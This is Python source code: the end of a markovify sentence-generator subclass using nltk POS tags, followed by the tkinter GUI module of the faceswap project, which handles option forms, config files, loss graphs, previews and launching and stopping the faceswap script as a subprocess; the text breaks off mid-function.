text = " ".join([self._prepare_text(line)
for line in lines if line.strip()])
return markovify.split_into_sentences(text)
def word_split(self, sentence):
words = re.split(self.word_split_pattern, sentence)
words = ["::".join(tag) for tag in nltk.pos_tag(words)]
return words
def word_join(self, words):
sentence = " ".join(word.split("::")[0] for word in words)
return sentence
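# Illustrative round trip (tags depend on nltk's tagger):
# word_split('the cat') gives ['the::DT', 'cat::NN'], and
# word_join(['the::DT', 'cat::NN']) gives back 'the cat'.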
def make_short_sentence(self, max_chars, min_chars=0, beginning=None, **kwargs):
if beginning == None:
tries = kwargs.get('tries', 1000)
for _ in range(tries):
sentence = self.make_sentence(**kwargs)
if sentence and len(sentence) <= max_chars and len(sentence) >= min_chars:
return sentence
else:
tries = kwargs.get('tries', 1000)
split = self.word_split(beginning)
word_count = len(split)
if word_count == self.state_size:
init_state = tuple(split)
elif word_count > 0 and word_count < self.state_size:
init_state = tuple(
[BEGIN] * (self.state_size - word_count) + split)
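# Illustrative (the POS tag shown is hypothetical): with state_size 2 and
# beginning 'Hello', split holds one tagged word, so init_state becomes
# (BEGIN, 'Hello::NNP'), left-padded with markovify's BEGIN sentinel.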
else:
err_msg = "`make_short_sentence` with `beginning` for this model requires a string containing 1 to {0} words. Yours has {1}: {2}".format(
self.state_size, word_count, str(split))
raise ParamError(err_msg)
for _ in range(tries):
sentence = self.make_sentence(init_state, **kwargs)
if sentence and len(sentence) <= max_chars and len(sentence) >= min_chars:
return sentence
|
gui.py | #!/usr/bin/env python3
""" The optional GUI for faceswap """
import os
import re
import signal
import subprocess
from subprocess import PIPE, Popen, TimeoutExpired
import sys
from argparse import SUPPRESS
from math import ceil, floor
from threading import Thread
from time import time
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.animation as animation
from matplotlib import pyplot as plt
from matplotlib import style
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import numpy
from lib.cli import FullPaths, ComboFullPaths, DirFullPaths, FileFullPaths
from lib.Serializer import JSONSerializer
PATHSCRIPT = os.path.realpath(os.path.dirname(sys.argv[0]))
# An error will be thrown when importing tkinter for users without tkinter
# distribution packages or without an X-Console. Therefore if importing fails
# no attempt will be made to instantiate the gui.
try:
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import TclError
except ImportError:
tk = None
ttk = None
filedialog = None
messagebox = None
TclError = None
class Utils(object):
""" Inter-class object holding items that are required across classes """
def __init__(self, options, calling_file="faceswap.py"):
self.opts = options
self.icons = dict()
self.guitext = dict()
self.actionbtns = dict()
self.console = None
self.debugconsole = False
self.serializer = JSONSerializer
self.filetypes = (('Faceswap files', '*.fsw'), ('All files', '*.*'))
self.task = FaceswapControl(self, calling_file=calling_file)
self.runningtask = False
self.previewloc = os.path.join(PATHSCRIPT, '.gui_preview.png')
self.lossdict = dict()
def init_tk(self):
""" TK System must be on prior to setting tk variables,
so initialised from GUI """
pathicons = os.path.join(PATHSCRIPT, 'icons')
self.icons['folder'] = tk.PhotoImage(
file=os.path.join(pathicons, 'open_folder.png'))
self.icons['load'] = tk.PhotoImage(
file=os.path.join(pathicons, 'open_file.png'))
self.icons['save'] = tk.PhotoImage(
file=os.path.join(pathicons, 'save.png'))
self.icons['reset'] = tk.PhotoImage(
file=os.path.join(pathicons, 'reset.png'))
self.icons['clear'] = tk.PhotoImage(
file=os.path.join(pathicons, 'clear.png'))
self.guitext['help'] = tk.StringVar()
self.guitext['status'] = tk.StringVar()
def action_command(self, command):
""" The action to perform when the action button is pressed """
if self.runningtask:
self.action_terminate()
else:
self.action_execute(command)
def action_execute(self, command):
""" Execute the task in Faceswap.py """
self.clear_console()
self.task.prepare(self.opts, command)
self.task.execute_script()
def action_terminate(self):
""" Terminate the subprocess Faceswap.py task """
self.task.terminate()
self.runningtask = False
self.clear_display_panel()
self.change_action_button()
def clear_display_panel(self):
""" Clear the preview window and graph """
self.delete_preview()
self.lossdict = dict()
def change_action_button(self):
""" Change the action button to relevant control """
for cmd in self.actionbtns.keys():
btnact = self.actionbtns[cmd]
if self.runningtask:
ttl = 'Terminate'
hlp = 'Exit the running process'
else:
ttl = cmd.title()
hlp = 'Run the {} script'.format(cmd.title())
btnact.config(text=ttl)
Tooltip(btnact, text=hlp, wraplength=200)
def clear_console(self):
""" Clear the console output screen """
self.console.delete(1.0, tk.END)
def load_config(self, command=None):
""" Load a saved config file """
cfgfile = filedialog.askopenfile(mode='r', filetypes=self.filetypes)
if not cfgfile:
return
cfg = self.serializer.unmarshal(cfgfile.read())
if command is None:
for cmd, opts in cfg.items():
self.set_command_args(cmd, opts)
else:
opts = cfg.get(command, None)
if opts:
self.set_command_args(command, opts)
else:
self.clear_console()
print('No ' + command + ' section found in file')
def set_command_args(self, command, options):
""" Pass the saved config items back to the GUI """
for srcopt, srcval in options.items():
for dstopts in self.opts[command]:
if dstopts['control_title'] == srcopt:
dstopts['value'].set(srcval)
break
def save_config(self, command=None):
""" Save the current GUI state to a config file in json format """
cfgfile = filedialog.asksaveasfile(mode='w',
filetypes=self.filetypes,
defaultextension='.fsw')
if not cfgfile:
return
if command is None:
cfg = {cmd: {opt['control_title']: opt['value'].get() for opt in opts}
for cmd, opts in self.opts.items()}
else:
cfg = {command: {opt['control_title']: opt['value'].get()
for opt in self.opts[command]}}
cfgfile.write(self.serializer.marshal(cfg))
cfgfile.close()
def reset_config(self, command=None):
""" Reset the GUI to the default values """
if command is None:
options = [opt for opts in self.opts.values() for opt in opts]
else:
options = [opt for opt in self.opts[command]]
for option in options:
default = option.get('default', '')
default = '' if default is None else default
option['value'].set(default)
def clear_config(self, command=None):
""" Clear all values from the GUI """
if command is None:
options = [opt for opts in self.opts.values() for opt in opts]
else:
options = [opt for opt in self.opts[command]]
for option in options:
if isinstance(option['value'].get(), bool):
option['value'].set(False)
elif isinstance(option['value'].get(), int):
option['value'].set(0)
else:
option['value'].set('')
def delete_preview(self):
""" Delete the preview file """
if os.path.exists(self.previewloc):
os.remove(self.previewloc)
def get_chosen_action(self, task_name):
return self.opts[task_name][0]['value'].get()
class Tooltip:
"""
Create a tooltip for a given widget as the mouse goes on it.
Adapted from StackOverflow:
http://stackoverflow.com/questions/3221956/
what-is-the-simplest-way-to-make-tooltips-
in-tkinter/36221216#36221216
http://www.daniweb.com/programming/software-development/
code/484591/a-tooltip-class-for-tkinter
- Originally written by vegaseat on 2014.09.09.
- Modified to include a delay time by Victor Zaccardo on 2016.03.25.
- Modified
- to correct extreme right and extreme bottom behavior,
- to stay inside the screen whenever the tooltip might go out on
the top but still the screen is higher than the tooltip,
- to use the more flexible mouse positioning,
- to add customizable background color, padding, waittime and
wraplength on creation
by Alberto Vassena on 2016.11.05.
Tested on Ubuntu 16.04/16.10, running Python 3.5.2
"""
def __init__(self, widget,
*,
background='#FFFFEA',
pad=(5, 3, 5, 3),
text='widget info',
waittime=400,
wraplength=250):
self.waittime = waittime  # in milliseconds, originally 500
self.wraplength = wraplength # in pixels, originally 180
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.on_enter)
self.widget.bind("<Leave>", self.on_leave)
self.widget.bind("<ButtonPress>", self.on_leave)
self.background = background
self.pad = pad
self.ident = None
self.topwidget = None
def on_enter(self, event=None):
""" Schedule on an enter event """
self.schedule()
def on_leave(self, event=None):
""" Unschedule on a leave event """
self.unschedule()
self.hide()
def schedule(self):
""" Show the tooltip after wait period """
self.unschedule()
self.ident = self.widget.after(self.waittime, self.show)
def unschedule(self):
""" Hide the tooltip """
id_ = self.ident
self.ident = None
if id_:
self.widget.after_cancel(id_)
def show(self):
""" Show the tooltip """
def tip_pos_calculator(widget, label,
*,
tip_delta=(10, 5), pad=(5, 3, 5, 3)):
""" Calculate the tooltip position """
s_width, s_height = widget.winfo_screenwidth(), widget.winfo_screenheight()
width, height = (pad[0] + label.winfo_reqwidth() + pad[2],
pad[1] + label.winfo_reqheight() + pad[3])
mouse_x, mouse_y = widget.winfo_pointerxy()
x_1, y_1 = mouse_x + tip_delta[0], mouse_y + tip_delta[1]
x_2, y_2 = x_1 + width, y_1 + height
x_delta = x_2 - s_width
if x_delta < 0:
x_delta = 0
y_delta = y_2 - s_height
if y_delta < 0:
y_delta = 0
offscreen = (x_delta, y_delta) != (0, 0)
if offscreen:
if x_delta:
x_1 = mouse_x - tip_delta[0] - width
if y_delta:
y_1 = mouse_y - tip_delta[1] - height
offscreen_again = y_1 < 0 # out on the top
if offscreen_again:
# No further checks will be done.
# TIP:
# A further mod might automagically augment the
# wraplength when the tooltip is too high to be
# kept inside the screen.
y_1 = 0
return x_1, y_1
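# Illustrative numbers: on a 1920x1080 screen with the mouse at
# (1900, 1060) and a roughly 200x60 tooltip, both deltas are positive,
# so the tip is flipped to the left of and above the pointer; if that
# would push y_1 above the top edge it is clamped to 0.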
background = self.background
pad = self.pad
widget = self.widget
# creates a toplevel window
self.topwidget = tk.Toplevel(widget)
# Leaves only the label and removes the app window
self.topwidget.wm_overrideredirect(True)
win = tk.Frame(self.topwidget,
background=background,
borderwidth=0)
label = tk.Label(win,
text=self.text,
justify=tk.LEFT,
background=background,
relief=tk.SOLID,
borderwidth=0,
wraplength=self.wraplength)
label.grid(padx=(pad[0], pad[2]),
pady=(pad[1], pad[3]),
sticky=tk.NSEW)
win.grid()
xpos, ypos = tip_pos_calculator(widget, label)
self.topwidget.wm_geometry("+%d+%d" % (xpos, ypos))
def hide(self):
""" Hide the tooltip """
topwidget = self.topwidget
if topwidget:
topwidget.destroy()
self.topwidget = None
class FaceswapGui(object):
""" The Graphical User Interface """
def __init__(self, utils, calling_file='faceswap.py'):
self.gui = tk.Tk()
self.utils = utils
self.calling_file = calling_file
self.utils.delete_preview()
self.utils.init_tk()
self.gui.protocol('WM_DELETE_WINDOW', self.close_app)
def build_gui(self):
""" Build the GUI """
self.gui.title(self.calling_file)
self.menu()
container = tk.PanedWindow(self.gui,
sashrelief=tk.RAISED,
orient=tk.VERTICAL)
container.pack(fill=tk.BOTH, expand=True)
topcontainer = tk.PanedWindow(container,
sashrelief=tk.RAISED,
orient=tk.HORIZONTAL)
container.add(topcontainer)
bottomcontainer = ttk.Frame(container, height=150)
container.add(bottomcontainer)
optsnotebook = ttk.Notebook(topcontainer, width=400, height=500)
topcontainer.add(optsnotebook)
if self.calling_file == 'faceswap.py':
# Commands explicitly stated to ensure consistent ordering
cmdlist = ('extract', 'train', 'convert')
else:
cmdlist = self.utils.opts.keys()
for command in cmdlist:
commandtab = CommandTab(self.utils, optsnotebook, command)
commandtab.build_tab()
dspnotebook = ttk.Notebook(topcontainer, width=780)
topcontainer.add(dspnotebook)
for display in ('graph', 'preview'):
displaytab = DisplayTab(self.utils, dspnotebook, display)
displaytab.build_tab()
self.add_console(bottomcontainer)
self.add_status_bar(bottomcontainer)
def menu(self):
""" Menu bar for loading and saving configs """
menubar = tk.Menu(self.gui)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label='Load full config...',
command=self.utils.load_config)
filemenu.add_command(label='Save full config...',
command=self.utils.save_config)
filemenu.add_separator()
filemenu.add_command(label='Reset all to default',
command=self.utils.reset_config)
filemenu.add_command(label='Clear all',
command=self.utils.clear_config)
filemenu.add_separator()
filemenu.add_command(label='Quit', command=self.close_app)
menubar.add_cascade(label="File", menu=filemenu)
self.gui.config(menu=menubar)
def add_console(self, frame):
""" Build the output console """
consoleframe = ttk.Frame(frame)
consoleframe.pack(side=tk.TOP, anchor=tk.W, padx=10, pady=(2, 0),
fill=tk.BOTH, expand=True)
console = ConsoleOut(consoleframe, self.utils)
console.build_console()
def add_status_bar(self, frame):
""" Build the info text section page """
statusframe = ttk.Frame(frame)
statusframe.pack(side=tk.BOTTOM, anchor=tk.W, padx=10, pady=2,
fill=tk.X, expand=False)
lbltitle = ttk.Label(statusframe, text='Status:', width=6, anchor=tk.W)
lbltitle.pack(side=tk.LEFT, expand=False)
self.utils.guitext['status'].set('Ready')
lblstatus = ttk.Label(statusframe,
width=20,
textvariable=self.utils.guitext['status'],
anchor=tk.W)
lblstatus.pack(side=tk.LEFT, anchor=tk.W, fill=tk.X, expand=True)
def close_app(self):
""" Close Python. This is here because the graph animation function
continues to
run even when tkinter has gone away """
confirm = messagebox.askokcancel
confirmtxt = 'Processes are still running. Are you sure...?'
if self.utils.runningtask and not confirm('Close', confirmtxt):
return
if self.utils.runningtask:
self.utils.task.terminate()
self.utils.delete_preview()
self.gui.quit()
exit()
class ConsoleOut(object):
""" The Console out tab of the Display section """
def __init__(self, frame, utils):
self.frame = frame
utils.console = tk.Text(self.frame)
self.console = utils.console
self.debug = utils.debugconsole
def build_console(self):
""" Build and place the console """
self.console.config(width=100, height=6, bg='gray90', fg='black')
self.console.pack(side=tk.LEFT, anchor=tk.N, fill=tk.BOTH, expand=True)
scrollbar = ttk.Scrollbar(self.frame, command=self.console.yview)
scrollbar.pack(side=tk.LEFT, fill='y')
self.console.configure(yscrollcommand=scrollbar.set)
if self.debug:
print('Console debug activated. Outputting to main terminal')
else:
sys.stdout = SysOutRouter(console=self.console, out_type="stdout")
sys.stderr = SysOutRouter(console=self.console, out_type="stderr")
class SysOutRouter(object):
""" Route stdout/stderr to the console window """
def __init__(self, console=None, out_type=None):
self.console = console
self.out_type = out_type
self.color = ("black" if out_type == "stdout" else "red")
def write(self, string):
""" Capture stdout/stderr """
self.console.insert(tk.END, string, self.out_type)
self.console.tag_config(self.out_type, foreground=self.color)
self.console.see(tk.END)
@staticmethod
def flush():
""" If flush is forced, send it to normal terminal """
sys.__stdout__.flush()
class CommandTab(object):
""" Tabs to hold the command options """
def __init__(self, utils, notebook, command):
self.utils = utils
self.notebook = notebook
self.page = ttk.Frame(self.notebook)
self.command = command
self.title = command.title()
def build_tab(self):
""" Build the tab """
actionframe = ActionFrame(self.utils, self.page, self.command)
actionframe.build_frame()
self.add_frame_separator()
opts_frame = OptionsFrame(self.utils, self.page, self.command)
opts_frame.build_frame()
self.notebook.add(self.page, text=self.title)
def add_frame_separator(self):
""" Add a separator between left and right frames """
sep = ttk.Frame(self.page, height=2, relief=tk.RIDGE)
sep.pack(fill=tk.X, pady=(5, 0), side=tk.BOTTOM)
class OptionsFrame(object):
""" Options Frame - Holds the Options for each command """
def __init__(self, utils, page, command):
self.utils = utils
self.page = page
self.command = command
self.canvas = tk.Canvas(self.page, bd=0, highlightthickness=0)
self.canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
self.optsframe = tk.Frame(self.canvas)
self.optscanvas = self.canvas.create_window((0, 0), window=self.optsframe, anchor=tk.NW)
def build_frame(self):
""" Build the options frame for this command """
self.add_scrollbar()
self.canvas.bind('<Configure>', self.resize_frame)
for option in self.utils.opts[self.command]:
optioncontrol = OptionControl(self.utils, option, self.optsframe)
optioncontrol.build_full_control()
def add_scrollbar(self):
""" Add a scrollbar to the options frame """
scrollbar = ttk.Scrollbar(self.page, command=self.canvas.yview)
scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
self.canvas.config(yscrollcommand=scrollbar.set)
self.optsframe.bind("<Configure>", self.update_scrollbar)
def update_scrollbar(self, event):
""" Update the options frame scrollbar """
self.canvas.configure(scrollregion=self.canvas.bbox('all'))
def resize_frame(self, event):
""" Resize the options frame to fit the canvas """
canvas_width = event.width
self.canvas.itemconfig(self.optscanvas, width=canvas_width)
class OptionControl(object):
""" Build the correct control for the option parsed and place it on the
frame """
def __init__(self, utils, option, option_frame):
self.utils = utils
self.option = option
self.option_frame = option_frame
def build_full_control(self):
""" Build the correct control type for the option passed through """
ctl = self.option['control']
ctltitle = self.option['control_title']
sysbrowser = self.option['filesystem_browser']
ctlhelp = ' '.join(self.option.get('help', '').split())
ctlhelp = '. '.join(i.capitalize() for i in ctlhelp.split('. '))
ctlhelp = ctltitle + ' - ' + ctlhelp
ctlframe = self.build_one_control_frame()
dflt = self.option.get('default', '')
dflt = self.option.get('default', False) if ctl == ttk.Checkbutton else dflt
choices = self.option['choices'] if ctl == ttk.Combobox else None
self.build_one_control_label(ctlframe, ctltitle)
self.option['value'] = self.build_one_control(ctlframe,
ctl,
dflt,
ctlhelp,
choices,
sysbrowser)
def build_one_control_frame(self):
""" Build the frame to hold the control """
frame = ttk.Frame(self.option_frame)
frame.pack(fill=tk.X, expand=True)
return frame
@staticmethod
def build_one_control_label(frame, control_title):
""" Build and place the control label """
lbl = ttk.Label(frame, text=control_title, width=18, anchor=tk.W)
lbl.pack(padx=5, pady=5, side=tk.LEFT, anchor=tk.N)
def build_one_control(self, frame, control, default, helptext, choices,
sysbrowser):
""" Build and place the option controls """
default = default if default is not None else ''
var = tk.BooleanVar(
frame) if control == ttk.Checkbutton else tk.StringVar(frame)
var.set(default)
if sysbrowser is not None:
self.add_browser_buttons(frame, sysbrowser, var)
ctlkwargs = {'variable': var} if control == ttk.Checkbutton else {
'textvariable': var}
packkwargs = {'anchor': tk.W} if control == ttk.Checkbutton else {
'fill': tk.X, 'expand': True}
ctl = control(frame, **ctlkwargs)
if control == ttk.Combobox:
ctl['values'] = [choice for choice in choices]
ctl.pack(padx=5, pady=5, **packkwargs)
Tooltip(ctl, text=helptext, wraplength=200)
return var
def add_browser_buttons(self, frame, sysbrowser, filepath):
""" Add correct file browser button for control """
if sysbrowser == "combo":
img = self.utils.icons['load']
else:
img = self.utils.icons[sysbrowser]
action = getattr(self, 'ask_' + sysbrowser)
filetypes = self.option['filetypes']
fileopn = ttk.Button(frame, image=img,
command=lambda cmd=action: cmd(filepath,
filetypes))
fileopn.pack(padx=(0, 5), side=tk.RIGHT)
@staticmethod
def ask_folder(filepath, filetypes=None):
"""
Pop-up to get path to a directory
:param filepath: tkinter StringVar object that will store the path to a
directory.
:param filetypes: Unused argument to allow filetypes to be given in
ask_load().
"""
dirname = filedialog.askdirectory()
if dirname:
filepath.set(dirname)
@staticmethod
def ask_load(filepath, filetypes=None):
""" Pop-up to get path to a file """
if filetypes is None:
filename = filedialog.askopenfilename()
else:
# In case filetypes were not configured properly in the
# arguments_list
try:
filename = filedialog.askopenfilename(filetypes=filetypes)
except TclError:
# Retry with repaired filetypes before falling back to no filter
try:
filetypes = FileFullPaths.prep_filetypes(filetypes)
filename = filedialog.askopenfilename(filetypes=filetypes)
except TclError:
filename = filedialog.askopenfilename()
if filename:
filepath.set(filename)
@staticmethod
def ask_save(filepath, filetypes=None):
""" Pop-up to get path to save a new file """
if filetypes is None:
filename = filedialog.asksaveasfilename()
else:
# In case filetypes were not configured properly in the
# arguments_list
try:
filename = filedialog.asksaveasfilename(filetypes=filetypes)
except TclError:
# Retry with repaired filetypes before falling back to no filter
try:
filetypes = FileFullPaths.prep_filetypes(filetypes)
filename = filedialog.asksaveasfilename(filetypes=filetypes)
except TclError:
filename = filedialog.asksaveasfilename()
if filename:
filepath.set(filename)
@staticmethod
def ask_nothing(filepath, filetypes=None):
""" Method that does nothing, used for disabling open/save pop up """
return
def ask_combo(self, filepath, filetypes):
actions_open_type = self.option['actions_open_type']
task_name = actions_open_type['task_name']
chosen_action = self.utils.get_chosen_action(task_name)
action = getattr(self, "ask_" + actions_open_type[chosen_action])
filetypes = filetypes[chosen_action]
action(filepath, filetypes)
class ActionFrame(object):
"""Action Frame - Displays information and action controls """
def __init__(self, utils, page, command):
self.utils = utils
self.page = page
self.command = command
self.title = command.title()
def build_frame(self):
""" Add help display and Action buttons to the left frame of each
page """
frame = ttk.Frame(self.page)
frame.pack(fill=tk.BOTH, padx=(10, 5), side=tk.BOTTOM, anchor=tk.N)
self.add_action_button(frame)
self.add_util_buttons(frame)
def add_action_button(self, frame):
""" Add the action buttons for page """
actframe = ttk.Frame(frame)
actframe.pack(fill=tk.X, side=tk.LEFT, padx=5, pady=5)
btnact = ttk.Button(actframe,
text=self.title,
width=12,
command=lambda: self.utils.action_command(
self.command))
btnact.pack(side=tk.TOP)
Tooltip(btnact, text='Run the {} script'.format(self.title), wraplength=200)
self.utils.actionbtns[self.command] = btnact
def add_util_buttons(self, frame):
""" Add the section utility buttons """
utlframe = ttk.Frame(frame)
utlframe.pack(side=tk.RIGHT, padx=(5, 10), pady=5)
for utl in ('load', 'save', 'clear', 'reset'):
img = self.utils.icons[utl]
action = getattr(self.utils, utl + '_config')
btnutl = ttk.Button(utlframe,
image=img,
command=lambda cmd=action: cmd(self.command))
btnutl.pack(padx=2, side=tk.LEFT)
Tooltip(btnutl, text=utl.capitalize() + ' ' + self.title + ' config', wraplength=200)
class DisplayTab(object):
""" The display tabs """
def __init__(self, utils, notebook, display):
self.utils = utils
self.notebook = notebook
self.page = ttk.Frame(self.notebook)
self.display = display
self.title = self.display.title()
def build_tab(self):
""" Build the tab """
frame = ttk.Frame(self.page)
frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True, padx=5, pady=5)
if self.display == 'graph':
graphframe = GraphDisplay(frame, self.utils)
graphframe.create_graphs()
elif self.display == 'preview':
preview = PreviewDisplay(frame, self.utils.previewloc)
preview.update_preview()
else: # Dummy in a placeholder
lbl = ttk.Label(frame, text=self.display, width=15, anchor=tk.NW)
lbl.pack(padx=5, pady=5, side=tk.LEFT, anchor=tk.N)
self.notebook.add(self.page, text=self.title)
class GraphDisplay(object):
""" The Graph Tab of the Display section """
def __init__(self, frame, utils):
self.frame = frame
self.utils = utils
self.losskeys = None
self.graphpane = tk.PanedWindow(self.frame, sashrelief=tk.RAISED, orient=tk.VERTICAL)
self.graphpane.pack(fill=tk.BOTH, expand=True)
self.graphs = list()
def create_graphs(self):
""" create the graph frames when there are loss values to graph """
if not self.utils.lossdict:
self.frame.after(1000, self.create_graphs)
return
self.losskeys = sorted([key for key in self.utils.lossdict.keys()])
framecount = int(len(self.utils.lossdict) / 2)
for i in range(framecount):
self.add_graph(i)
self.monitor_state()
def add_graph(self, index):
""" Add a single graph to the graph window """
graphframe = ttk.Frame(self.graphpane)
self.graphpane.add(graphframe)
selectedkeys = self.losskeys[index * 2:(index + 1) * 2]
selectedloss = {key: self.utils.lossdict[key] for key in selectedkeys}
graph = Graph(graphframe, selectedloss, selectedkeys)
self.graphs.append(graph)
graph.build_graph()
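# Sketch (key names hypothetical): with sorted loss keys
# ['loss_A', 'loss_B', 'loss_C', 'loss_D'], index 0 plots the pair
# ('loss_A', 'loss_B') and index 1 plots ('loss_C', 'loss_D'),
# one graph frame per pair of keys.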
def monitor_state(self):
""" Check there is a task still running. If not, destroy graphs
and reset graph display to waiting state """
if self.utils.lossdict:
self.frame.after(5000, self.monitor_state)
return
self.destroy_graphs()
self.create_graphs()
def destroy_graphs(self):
""" Destroy graphs when the process has stopped """
for graph in self.graphs:
del graph
self.graphs = list()
for child in self.graphpane.panes():
self.graphpane.remove(child)
class Graph(object):
""" Each graph to be displayed. Until training is run it is not known
how many graphs will be required, so they sit in their own class
ready to be created when requested """
def __init__(self, frame, loss, losskeys):
self.frame = frame
self.loss = loss
self.losskeys = losskeys
self.ylim = (100, 0)
style.use('ggplot')
self.fig = plt.figure(figsize=(4, 4), dpi=75)
self.ax1 = self.fig.add_subplot(1, 1, 1)
self.losslines = list()
self.trndlines = list()
def build_graph(self):
""" Update the plot area with loss values and cycle through to
animate """
self.ax1.set_xlabel('Iterations')
self.ax1.set_ylabel('Loss')
self.ax1.set_ylim(0.00, 0.01)
self.ax1.set_xlim(0, 1)
losslbls = [lbl.replace('_', ' ').title() for lbl in self.losskeys]
for idx, linecol in enumerate(['blue', 'red']):
self.losslines.extend(self.ax1.plot(0, 0,
color=linecol,
linewidth=1,
label=losslbls[idx]))
for idx, linecol in enumerate(['navy', 'firebrick']):
lbl = losslbls[idx]
lbl = 'Trend{}'.format(lbl[lbl.rfind(' '):])
self.trndlines.extend(self.ax1.plot(0, 0,
color=linecol,
linewidth=2,
label=lbl))
self.ax1.legend(loc='upper right')
plt.subplots_adjust(left=0.075, bottom=0.075, right=0.95, top=0.95,
wspace=0.2, hspace=0.2)
plotcanvas = FigureCanvasTkAgg(self.fig, self.frame)
plotcanvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=True)
ani = animation.FuncAnimation(self.fig, self.animate, interval=2000, blit=False)
plotcanvas.draw()
def animate(self, i):
""" Read loss data and apply to graph """
loss = [self.loss[key][:] for key in self.losskeys]
xlim = self.recalculate_axes(loss)
xrng = [x for x in range(xlim)]
self.raw_plot(xrng, loss)
if xlim > 10:
self.trend_plot(xrng, loss)
def recalculate_axes(self, loss):
""" Recalculate the latest x and y axes limits from latest data """
ymin = floor(min([min(lossvals) for lossvals in loss]) * 100) / 100
ymax = ceil(max([max(lossvals) for lossvals in loss]) * 100) / 100
if ymin < self.ylim[0] or ymax > self.ylim[1]:
self.ylim = (ymin, ymax)
self.ax1.set_ylim(self.ylim[0], self.ylim[1])
xlim = len(loss[0])
xlim = 2 if xlim == 1 else xlim
self.ax1.set_xlim(0, xlim - 1)
return xlim
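# Illustrative: loss values spanning 0.0234 to 0.0456 give ylim
# (0.02, 0.05) via the floor/ceil to two decimal places, and a single
# data point is stretched to xlim 2 so the x range is never zero.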
def raw_plot(self, x_range, loss):
""" Raw value plotting """
for idx, lossvals in enumerate(loss):
self.losslines[idx].set_data(x_range, lossvals)
def trend_plot(self, x_range, loss):
""" Trend value plotting """
for idx, lossvals in enumerate(loss):
fit = numpy.polyfit(x_range, lossvals, 3)
poly = numpy.poly1d(fit)
self.trndlines[idx].set_data(x_range, poly(x_range))
class PreviewDisplay(object):
""" The Preview tab of the Display section """
def __init__(self, frame, previewloc):
self.frame = frame
self.previewimg = None
self.errcount = 0
self.previewloc = previewloc
self.previewlbl = ttk.Label(self.frame, image=None, anchor=tk.NW)
self.previewlbl.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def update_preview(self):
""" Display the image if it exists or a place holder if it doesn't """
self.load_preview()
if self.previewimg is None:
self.previewlbl.config(image=None)
else:
self.previewlbl.config(image=self.previewimg)
self.previewlbl.after(1000, self.update_preview)
def load_preview(self):
""" Load the preview image into tk PhotoImage """
if os.path.exists(self.previewloc):
try:
self.previewimg = tk.PhotoImage(file=self.previewloc)
self.errcount = 0
except TclError:
# This is probably an error from reading the file whilst it's being
# saved, so ignore it for now and only report an error if there have
# been multiple consecutive failures
if self.errcount < 10:
self.errcount += 1
self.previewimg = None
else:
print('Error reading the preview file')
else:
self.previewimg = None
class FaceswapControl(object):
""" Control the underlying Faceswap tasks """
__group_processes = ["effmpeg"]
def __init__(self, utils, calling_file="faceswap.py"):
self.pathexecscript = os.path.join(PATHSCRIPT, calling_file)
self.utils = utils
self.command = None
self.args = None
self.process = None
self.lenloss = 0
def prepare(self, options, command):
""" Prepare for running the subprocess """
self.command = command
self.utils.runningtask = True
self.utils.change_action_button()
self.utils.guitext['status'].set('Executing - ' + self.command + '.py')
print('Loading...')
self.args = ['python', '-u', self.pathexecscript, self.command]
self.build_args(options)
def build_args(self, options):
""" Build the faceswap command and arguments list """
for item in options[self.command]:
optval = str(item.get('value', '').get())
opt = item['opts'][0]
if optval == 'False' or optval == '':
continue
elif optval == 'True':
if self.command == 'train' and opt == '-p': # Embed the preview pane
self.args.append('-gui')
else:
self.args.append(opt)
else:
self.args.extend((opt, optval))
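# Sketch of the result (option values hypothetical): running 'train'
# with a model dir of '/models' and the preview box ticked builds
# ['python', '-u', <script>, 'train', '-m', '/models', '-gui'].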
def execute_script(self):
""" Execute the requested Faceswap Script """
kwargs = {'stdout': PIPE,
'stderr': PIPE,
'bufsize': 1,
'universal_newlines': True}
if self.command in self.__group_processes:
kwargs['preexec_fn'] = os.setsid
if os.name == 'nt':
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
self.process = Popen(self.args, **kwargs)
self.thread_stdout()
self.thread_stderr()
def read_stdout(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stdout.readline()
if output == '' and self.process.poll() is not None:
break
if output:
if self.command == 'train' and output.startswith('['):
self.capture_loss(output)
print(output.strip())
returncode = self.process.poll()
self.utils.runningtask = False
self.utils.change_action_button()
self.set_final_status(returncode)
print('Process exited.')
def read_stderr(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stderr.readline()
if output == '' and self.process.poll() is not None:
break
print(output.strip(), file=sys.stderr)
def thread_stdout(self):
""" Put the subprocess stdout so that it can be read without
blocking """
thread = Thread(target=self.read_stdout)
thread.daemon = True
thread.start()
def thread_stderr(self):
""" Put the subprocess stderr so that it can be read without
blocking """
thread = Thread(target=self.read_stderr)
thread.daemon = True
thread.start()
def capture_loss(self, string):
""" Capture loss values from stdout """
# TODO: Remove this hideous hacky fix. When the subprocess is terminated and
# the loss dictionary is reset, 1 set of loss values ALWAYS slips through
# and appends to the lossdict AFTER the subprocess has closed meaning that
# checks on whether the dictionary is empty fail.
# Therefore if the size of current loss dictionary is smaller than the
# previous loss dictionary, assume that the process has been terminated
# and reset it.
# I have tried and failed to empty the subprocess stdout with:
# sys.exit() on the stdout/err threads (no effect)
# sys.stdout/stderr.flush (no effect)
# thread.join (locks the whole process up, because the stdout thread
# stubbornly refuses to release its last line)
currentlenloss = len(self.utils.lossdict)
if self.lenloss > currentlenloss:
self.utils.lossdict = dict()
self.lenloss = 0
return
self.lenloss = currentlenloss
loss = re.findall(r'([a-zA-Z_]+):.*?(\d+\.\d+)', string)
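# e.g. an (illustrative) line '[#00123] loss_A: 0.02341, loss_B: 0.02173'
# yields [('loss_A', '0.02341'), ('loss_B', '0.02173')]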
if len(loss) < 2:
return
if not self.utils.lossdict:
self.utils.lossdict.update((item[0], []) for item in loss)
for item in loss:
self.utils.lossdict[item[0]].append(float(item[1]))
def terminate(self):
""" Terminate the subprocess """
if self.command == 'train':
print('Sending Exit Signal', flush=True)
try:
now = time()
if os.name == 'nt':
os.kill(self.process.pid, signal.CTRL_BREAK_EVENT)
